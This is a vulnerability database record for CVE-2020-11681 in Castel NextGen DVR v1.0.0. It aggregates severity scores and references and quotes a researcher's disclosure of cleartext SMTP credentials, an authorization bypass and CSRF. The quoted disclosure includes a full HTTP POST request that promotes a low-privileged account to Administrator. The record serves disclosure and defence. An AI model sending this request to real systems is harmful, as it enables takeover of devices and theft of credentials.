Sign-up

ID

VAR-202006-0044


CVE

CVE-2020-11681


TITLE

Castel NextGen DVR Vulnerability regarding inadequate protection of credentials in

Trust: 0.8

sources: JVNDB: JVNDB-2020-006192

DESCRIPTION

Castel NextGen DVR v1.0.0 stores and displays credentials for the associated SMTP server in cleartext. Low privileged users can exploit this to create an administrator user and obtain the SMTP credentials. Castel NextGen DVR Exists in an inadequate protection of credentials.Information may be obtained or tampered with. All issues are associated with *Castel NextGen DVR v1.0.0 *and have been resolved in v1.0.1*.* ------------------------------- *CVE-2020-11679 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role: POST /Administration/Users/Edit/:ID HTTP/1.1 > Host: $RHOST > User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 > Firefox/52.0 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-US,en;q=0.5 > Accept-Encoding: gzip, deflate > Cookie: $REVIEWER_COOKIES > DNT: 1 > Connection: close > Upgrade-Insecure-Requests: 1 > Content-Type: application/x-www-form-urlencoded > Content-Length: 349 > UserId=:ID&Email=bypass%40test.com > &FirstName=bypass&LastName=bypass&LDAPUser=false > > &Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false > > &Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false > > &Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false > &Locked=false ------------------------------- *CVE-2020-11680 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET, however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user. ------------------------------- *CVE-2020-11681 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681>* *Original Disclosure* https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass *Description* Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account. or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised. ------------------------------- *CVE-2020-11682 <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682>* *Original Disclosure* https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf *Description* The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed. AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image: SecurityMetrics]

Trust: 2.25

sources: NVD: CVE-2020-11681 // JVNDB: JVNDB-2020-006192 // CNVD: CNVD-2021-24900 // PACKETSTORM: 157954

IOT TAXONOMY

category:['IoT']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2021-24900

AFFECTED PRODUCTS

vendor:castelmodel:nextgen dvrscope:eqversion:1.0.0

Trust: 2.4

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681

CVSS

SEVERITY

CVSSV2

CVSSV3

NVD: CVE-2020-11681
value: HIGH

Trust: 1.0

NVD: JVNDB-2020-006192
value: HIGH

Trust: 0.8

CNVD: CNVD-2021-24900
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-202006-503
value: HIGH

Trust: 0.6

NVD:
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 2.9
acInsufInfo: FALSE
obtainAllPrivilege: FALSE
obtainUserPrivilege: FALSE
obtainOtherPrivilege: FALSE
userInteractionRequired: FALSE
version: 2.0

Trust: 1.0

NVD: JVNDB-2020-006192
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.8

CNVD: CNVD-2021-24900
severity: MEDIUM
baseScore: 4.0
vectorString: AV:N/AC:L/AU:S/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: SINGLE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.0
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

NVD:
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 5.2
version: 3.1

Trust: 1.0

NVD: JVNDB-2020-006192
baseSeverity: HIGH
baseScore: 8.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: LOW
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: NONE
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: CNVD: CNVD-2021-24900 // JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681 // CNNVD: CNNVD-202006-503

PROBLEMTYPE DATA

problemtype:CWE-522

Trust: 1.8

sources: JVNDB: JVNDB-2020-006192 // NVD: CVE-2020-11681

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202006-503

TYPE

other

Trust: 0.6

sources: CNNVD: CNNVD-202006-503

CONFIGURATIONS

sources:
            
            
            NVD: CVE-2020-11681

PATCH
title:Digital Video Recorder (DVR)url:http://castle-cctv.kr/digital-video-recorder-dvr/
Trust: 0.8
title:Patch for Castel NextGen DVR administrator creates vulnerabilityurl:https://www.cnvd.org.cn/patchinfo/show/255921
Trust: 0.6
title:Castel NextGen DVR Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121160
Trust: 0.6
sources:
            
            
            CNVD: CNVD-2021-24900 // 
            
            
            
            JVNDB: JVNDB-2020-006192 // 
            
            
            
            CNNVD: CNNVD-202006-503

EXTERNAL IDS
db:NVDid:CVE-2020-11681
Trust: 3.1
db:PACKETSTORMid:157954
Trust: 3.1
db:JVNDBid:JVNDB-2020-006192
Trust: 0.8
db:CNVDid:CNVD-2021-24900
Trust: 0.6
db:CNNVDid:CNNVD-202006-503
Trust: 0.6
sources:
            
            
            CNVD: CNVD-2021-24900 // 
            
            
            
            JVNDB: JVNDB-2020-006192 // 
            
            
            
            PACKETSTORM: 157954 // 
            
            
            
            NVD: CVE-2020-11681 // 
            
            
            
            CNNVD: CNNVD-202006-503

REFERENCES
url:http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html
Trust: 3.6
url:https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass
Trust: 1.7
url:http://seclists.org/fulldisclosure/2020/jun/8
Trust: 1.6
url:https://nvd.nist.gov/vuln/detail/cve-2020-11681
Trust: 1.5
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681
Trust: 0.8
url:https://nvd.nist.gov/vuln/detail/cve-2020-11680
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679>*
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681>*
Trust: 0.1
url:https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680>*
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2020-11679
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2020-11682
Trust: 0.1
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682>*
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2021-24900 // 
            
            
            
            JVNDB: JVNDB-2020-006192 // 
            
            
            
            PACKETSTORM: 157954 // 
            
            
            
            NVD: CVE-2020-11681 // 
            
            
            
            CNNVD: CNNVD-202006-503

CREDITS
Aaron Bishop
Trust: 0.7
sources:
            
            
            PACKETSTORM: 157954 // 
            
            
            
            CNNVD: CNNVD-202006-503

SOURCES
db:CNVDid:CNVD-2021-24900
db:JVNDBid:JVNDB-2020-006192
db:PACKETSTORMid:157954
db:NVDid:CVE-2020-11681
db:CNNVDid:CNNVD-202006-503

LAST UPDATE DATE
2023-12-18T12:27:28.607000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2021-24900date:2021-04-04T00:00:00
db:JVNDBid:JVNDB-2020-006192date:2020-07-02T00:00:00
db:NVDid:CVE-2020-11681date:2020-06-10T17:31:33.467
db:CNNVDid:CNNVD-202006-503date:2021-01-04T00:00:00

SOURCES RELEASE DATE
db:CNVDid:CNVD-2021-24900date:2021-04-04T00:00:00
db:JVNDBid:JVNDB-2020-006192date:2020-07-02T00:00:00
db:PACKETSTORMid:157954date:2020-06-05T18:19:24
db:NVDid:CVE-2020-11681date:2020-06-04T19:15:12.850
db:CNNVDid:CNNVD-202006-503date:2020-06-04T00:00:00